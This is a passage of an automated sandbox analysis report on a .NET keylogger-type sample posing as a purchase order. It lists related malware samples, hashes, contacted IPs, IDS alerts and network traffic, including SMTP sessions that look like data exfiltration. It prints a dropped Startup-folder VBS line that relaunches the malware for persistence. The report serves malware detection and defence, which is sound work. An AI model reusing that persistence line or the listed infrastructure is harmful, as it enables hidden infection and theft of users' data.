                                                                            • 104.21.48.1
                                                                            wkFEXQNJ9p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.32.1
                                                                            Nnsy4IvTvO.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.96.1
                                                                            UTMEMUSly1dkCzsOZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            UQaaxEZwyg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            1evYVracjk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            tng2fDLoUK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            UO6rlOX6cT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 132.226.8.169
                                                                            g24MtZOMrp.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            wkFEXQNJ9p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            Nnsy4IvTvO.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            miYVCPJgtg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            jmh61pt3ob.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            INMOTI-1USyakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 70.39.239.245
                                                                            27#U0646.batGet hashmaliciousAsyncRATBrowse
                                                                            • 23.235.204.134
                                                                            https://compucallinc.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                            • 69.174.52.100
                                                                            https://compucallinc.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                            • 69.174.52.100
                                                                            trow.exeGet hashmaliciousUnknownBrowse
                                                                            • 70.39.251.249
                                                                            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                            • 70.39.239.250
                                                                            rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 198.46.91.127
                                                                            https://herald-review.com/users/logout-success/?expire=1626371676&referer_url=http://209.159.152.50Get hashmaliciousHTMLPhisherBrowse
                                                                            • 199.250.197.4
                                                                            Mein-Dienstrad Proposal.emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 144.208.72.199
                                                                            https://secure.flyerpr.com/~cafemagui/wordpress/wp-includes/css/kr.html#jh.lee@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                            • 173.231.222.96

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            54328bd36c14bd82ddaa0c04b25ed9adly1dkCzsOZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.80.1
                                                                            UQaaxEZwyg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            lOZOR68JAB.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            1evYVracjk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            tng2fDLoUK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            UO6rlOX6cT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.80.1
                                                                            g24MtZOMrp.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.80.1
                                                                            wkFEXQNJ9p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            Nnsy4IvTvO.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.80.1
                                                                            OkxI7TL5y9.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.80.1

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Roaming\Activator.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\TtLlwb3ava.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1882112
                                                                            Entropy (8bit):7.5097475300709196
                                                                            Encrypted:false
                                                                            SSDEEP:49152:n1DIn7+d8JgCku5/s+BcCSnJH5yrD8PyhUxt:n1DSJRx9iV5ykvx
                                                                            MD5:1E20CE6BBF686369929E0D191F9607AD
                                                                            SHA1:7ABC4E70E996EC2E05BFC1417DB7DAF49D12032E
                                                                            SHA-256:1622C28FA57B7FF8998EAC6AE42E6CB6662446C47B25FF24BEFB841356267C7D
                                                                            SHA-512:91DA74714D1070C2BE62E54AB349CBBAE701A0B345BBD89F482D1CBD27B2D7B17C27DBD611445E5468B25083F18C2012CAED0526B531E0F8C2FB2720700A6ADD
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@.g............................n.... ........@.. ....................... ............`.....................................O.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H.......h................ ..................................................h{I.Mh`.....h{9.....f...V....N.............BL......Pb.L....r.....+....h..n).SMG...;.j........B..Z......5...8..{.K.....E.0..t...A..Pb.%...?"...A....{Z...V ...A.o]..<]................0.L.../...5...;...=...C...............................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\Activator.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\TtLlwb3ava.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\TtLlwb3ava.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):87
                                                                            Entropy (8bit):4.674867175354459
                                                                            Encrypted:false
                                                                            SSDEEP:3:FER/n0eFHHoN+EaKC5wER8n:FER/lFHIN7aZ5X8
                                                                            MD5:DED81AEC80162B95AD64656ED9B118DC
                                                                            SHA1:7BE42A2EB05E2441A89E66E17C875726072CD08D
                                                                            SHA-256:8987FEFE775B00296E5F5A74B7F0500A4E850524980E62E53D1A0710F2F2E0D9
                                                                            SHA-512:AEDB26A0AFDC549D773273550846D5B3C7A32CBCA45EA4F7FEBFF7A94026268A75A93200B52322AF3A42AF3195DC79BB3F0E5D7753A336C988D081AB7A3D650C
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Activator.exe"""

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.5097475300709196
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:TtLlwb3ava.exe
                                                                            File size:1'882'112 bytes
                                                                            MD5:1e20ce6bbf686369929e0d191f9607ad
                                                                            SHA1:7abc4e70e996ec2e05bfc1417db7daf49d12032e
                                                                            SHA256:1622c28fa57b7ff8998eac6ae42e6cb6662446c47b25ff24befb841356267c7d
                                                                            SHA512:91da74714d1070c2be62e54ab349cbbae701a0b345bbd89f482d1cbd27b2d7b17c27dbd611445e5468b25083f18c2012caed0526b531e0f8c2fb2720700a6add
                                                                            SSDEEP:49152:n1DIn7+d8JgCku5/s+BcCSnJH5yrD8PyhUxt:n1DSJRx9iV5ykvx
                                                                            TLSH:7495E0107BE8DA1FE1BE1BB484B3A26597B1D49CE393E34F1EA464A96D537047D002B3
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..g............................n.... ........@.. ....................... ............`................................

                                                                            File Icon

                                                                            Icon Hash:90cececece8e8eb0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x5ccd6e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x67BBD340 [Mon Feb 24 02:02:40 2025 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1ccd1c0x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ce0000x5a6.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d00000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000x1cad740x1cae00e8d03b4ab71c806c7f6aa34349e2224aFalse0.7396235911536366data7.513094425002416IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x1ce0000x5a60x6008d02a69460afe377c408333c54af6f4dFalse0.4186197916666667data4.108165928395942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x1d00000xc0x200440e854cada97c0cc6381c19ea5f0783False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_VERSION0x1ce0a00x31cdata0.4321608040201005
                                                                            RT_MANIFEST0x1ce3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Version Infos

                                                                            DescriptionData
                                                                            Translation0x0000 0x04b0
                                                                            Comments
                                                                            CompanyName
                                                                            FileDescriptionPO#50241
                                                                            FileVersion1.0.0.0
                                                                            InternalNamePO#50241.exe
                                                                            LegalCopyrightCopyright 2016
                                                                            LegalTrademarks
                                                                            OriginalFilenamePO#50241.exe
                                                                            ProductNamePO#50241
                                                                            ProductVersion1.0.0.0
                                                                            Assembly Version1.0.0.0

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-03-11T04:11:36.972985+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649692132.226.8.16980TCP
                                                                            2025-03-11T04:11:46.817416+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649692132.226.8.16980TCP
                                                                            2025-03-11T04:11:51.708081+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649697132.226.8.16980TCP
                                                                            2025-03-11T04:12:02.301801+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649697132.226.8.16980TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 11, 2025 04:11:34.128443956 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:34.133358002 CET8049692132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:34.133450985 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:34.134108067 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:34.139017105 CET8049692132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:35.061326981 CET8049692132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:35.065959930 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:35.070769072 CET8049692132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:36.918642044 CET8049692132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:36.931723118 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:36.931762934 CET44349694104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:36.931858063 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:36.941905022 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:36.941920996 CET44349694104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:36.972985029 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:38.807157993 CET44349694104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:38.807305098 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:38.896663904 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:38.896683931 CET44349694104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:38.897082090 CET44349694104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:38.942394972 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:39.375214100 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:39.416322947 CET44349694104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:39.851627111 CET44349694104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:39.851700068 CET44349694104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:39.851763964 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:39.859627962 CET49694443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:45.019588947 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:45.024532080 CET8049692132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:46.765120029 CET8049692132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:46.817415953 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:46.878305912 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:46.883214951 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:46.883299112 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:47.372541904 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.372797966 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:47.377716064 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.620040894 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.621753931 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:47.626653910 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.721255064 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.722536087 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:47.727514029 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.828789949 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.829027891 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:47.833947897 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.928509951 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:47.929924965 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:47.934825897 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.031462908 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.031651974 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.036578894 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.131032944 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.133378029 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.133470058 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.133518934 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.133558035 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.133629084 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.133646011 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.133694887 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.133725882 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:48.138326883 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.138370991 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.138387918 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.138416052 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.138510942 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.138525963 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.138660908 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.138674974 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.138689041 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.155946970 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:48.160887957 CET8049697132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:48.160979033 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:48.161407948 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:48.166294098 CET8049697132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:48.244131088 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:11:48.286164045 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:11:50.292490959 CET8049697132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:50.302694082 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:50.307915926 CET8049697132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:51.657275915 CET8049697132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:11:51.659596920 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:51.659666061 CET44349699104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:51.659750938 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:51.664133072 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:51.664174080 CET44349699104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:51.708081007 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:53.463502884 CET44349699104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:53.463587999 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:53.465811014 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:53.465832949 CET44349699104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:53.466114998 CET44349699104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:53.520535946 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:53.592499018 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:53.636334896 CET44349699104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:54.112392902 CET44349699104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:54.112481117 CET44349699104.21.80.1192.168.2.6
                                                                            Mar 11, 2025 04:11:54.112668991 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:54.118887901 CET49699443192.168.2.6104.21.80.1
                                                                            Mar 11, 2025 04:11:59.688185930 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:11:59.693490028 CET8049697132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:12:02.258959055 CET8049697132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:12:02.287945032 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:02.292924881 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:02.293019056 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:02.301800966 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:12:02.785659075 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:02.815756083 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:02.824428082 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:02.916202068 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:02.930749893 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:02.936927080 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.032586098 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.032924891 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.038423061 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.142643929 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.146120071 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.151585102 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.249808073 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.250032902 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.259439945 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.351807117 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.354588985 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.359484911 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.454019070 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.454632998 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.454727888 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.454777002 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.454828978 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.454936028 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.454953909 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.454974890 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.454988956 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:03.459908009 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.460083008 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.460114002 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.460143089 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.460176945 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.460560083 CET58749701209.182.213.250192.168.2.6
